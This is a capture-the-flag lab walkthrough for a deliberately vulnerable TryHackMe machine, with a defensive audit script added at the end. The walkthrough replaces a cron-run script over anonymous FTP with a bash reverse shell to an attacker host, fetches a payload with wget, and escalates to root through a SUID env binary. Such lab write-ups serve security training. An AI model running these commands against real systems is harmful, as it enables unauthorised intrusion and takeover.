Anonymous — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Anonymous — TryHackMe — WriteUp. Check it out!

First, deploy the machine and scan for open ports with nmap.

nmap -A -T4 -v <ip>

As you can see, 4 ports are open: FTP, SSH, SMB. Since FTP allows anonymous login, let’s try it.

ftp <ip>

There are 3 files in the scripts folder. Download all of them with mget so we can read them:

mget *

Now let’s check the content of those files. The todo.txt contains nothing valuable; it only tells the user to disable anonymous FTP login. The will clean files in /tmp_files and then write the result to removed_files.log. So maybe there is a cron job for this script.

Next, use smbclient to look for shared folders.

smbclient -L <ip>

*Just press enter when it prompts for the password.

So there is a shared folder called “pics”. Let’s see what’s inside this folder.

smbclient //<ip>/pics

Then use dir to list the files and mget * to download all of them to our machine.

There are 2 photos, so there is likely some hidden data inside them. Let’s try to extract it using some metadata tools like steghide, exiftool, binwalk, stegcracker.

*if Stegcracker is included as default in your machine, download it from:

However, after a long wait, I could not get any data from the image.

Let’s go back to FTP. As I said above, maybe there is a cron job for the file. So if we change the content of to a reverse shell script and replace the original script on the target machine, we will have our shell.

Exec this cmd to change content of

echo "bash -i >& /dev/tcp/<host-ip>/4444 0>&1" >

Then log in to FTP again as anonymous, cd to scripts and use put to replace our with the original one.


As you can see, the has been replaced with the reverse shell command.

Now start a listener on our machine:

nc -lvnp 4444

*Note that you can add “rlwrap” before nc command so that you can use arrow keys and mouse scroll in the shell.

You will have the shell:

Get our first flag:

Now let’s get root. As you can see from the ‘id’ command, the user namelessone is in the lxd group. LXD is a docker in Linux, and you can use this misconfiguration to get root privileges.

After doing some research, I found this link. Follow the instructions step by step to get root:

First, clone the alpine builder repo and build:

git clone
cd lxd-alpine-builder

After the build has finished, you will see a .tar.gz file. Note the name, because you will be using it from now on. Do not copy my file name; it will be different for each machine.

Now start an HTTP server in the folder that contains your .tar.gz file in order to transfer this file to the victim machine:

python3 -m http.server 9000

or if you use python 2:

python -m SimpleHTTPServer 9000

On the victim machine, cd to /tmp (because you will have all the permissions in the /tmp folder) and use wget to get the .tar.gz file:

wget http://<host-ip>:9000/your-alpine-filename.tar.gz

The .tar.gz file has been transferred successfully.

Now run:

lxc image import ./your-alpine-filename.tar.gz --alias myimage

Run lxc image list to make sure that your image has been imported:

“myimage” has been imported successfully.

Now run this cmd to init our image:

lxc init myimage ignite -c security.privileged=true

OOPPS!!! There is no storage pool!! So we cannot use this way to get root…

Well let’s find another way…

find / -type f -perm -u=s 2>/dev/null

This find command lists all commands with the SUID permission set. You can learn more by searching SUID Linux on Google.

I found an interesting command here. It’s env. Exec this cmd to spawn a bash shell as root:

/usr/bin/env /bin/bash -p

As you can see, now I’m in the root group! Get the root.txt flag.

**Maybe many of you will ask why I didn’t delete the “lxd” part as it wasn’t successful. I won’t, because I want to show you that in real blackbox pentesting, we don’t know the exact way to exploit our victim machine. We need to try various ways again and again. Moreover, this time you cannot use the “lxd” method, but maybe it will work for another machine! So, learning is never redundant.
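
From the defender's side, the three weaknesses this box relies on (a cron-run script that other accounts can overwrite, a SUID env, and a user in the lxd group) can each be checked with a few lines of shell. The script below is an added example, not part of the original write-up; the function names, the crontab parsing and the assumption that the script is group- or world-writable are assumptions of this example.

```shell
#!/bin/sh
# Added audit example (not from the original write-up). Every check takes its
# input path as an argument so it can run on a host or on constructed fixtures.

# 1. Absolute paths named in a crontab that group or others can overwrite.
#    $1 = crontab file. Assumes the cron-run script is writable this way.
writable_cron_targets() {
    grep -v '^[[:space:]]*#' "$1" | tr -s '[:space:]' '\n' | grep '^/' |
    sort -u | while read -r path; do
        [ -f "$path" ] || continue
        if [ -n "$(find "$path" \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "$path"
        fi
    done
}

# 2. SUID files whose name is a program launcher (env is the one on the page).
#    $1 = directory to scan, $2 = optional space-separated basenames.
suid_launchers() {
    find "$1" -type f -perm -u=s 2>/dev/null | while read -r f; do
        for name in ${2:-env}; do
            if [ "$(basename "$f")" = "$name" ]; then echo "$f"; fi
        done
    done
}

# 3. Supplementary members of the lxd group. $1 = file in /etc/group format.
lxd_members() {
    awk -F: '$1 == "lxd" && $4 != "" { print $4 }' "$1"
}

# Run all three checks against the usual system locations (call it yourself).
audit_host() {
    echo "[cron targets writable by group/other]"; writable_cron_targets /etc/crontab
    echo "[SUID launchers]";                       suid_launchers /
    echo "[lxd group members]";                    lxd_members /etc/group
}
```

Source the file and call audit_host as root; the SUID scan walks the whole filesystem, so it can take a while.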

The end.


I’m Groot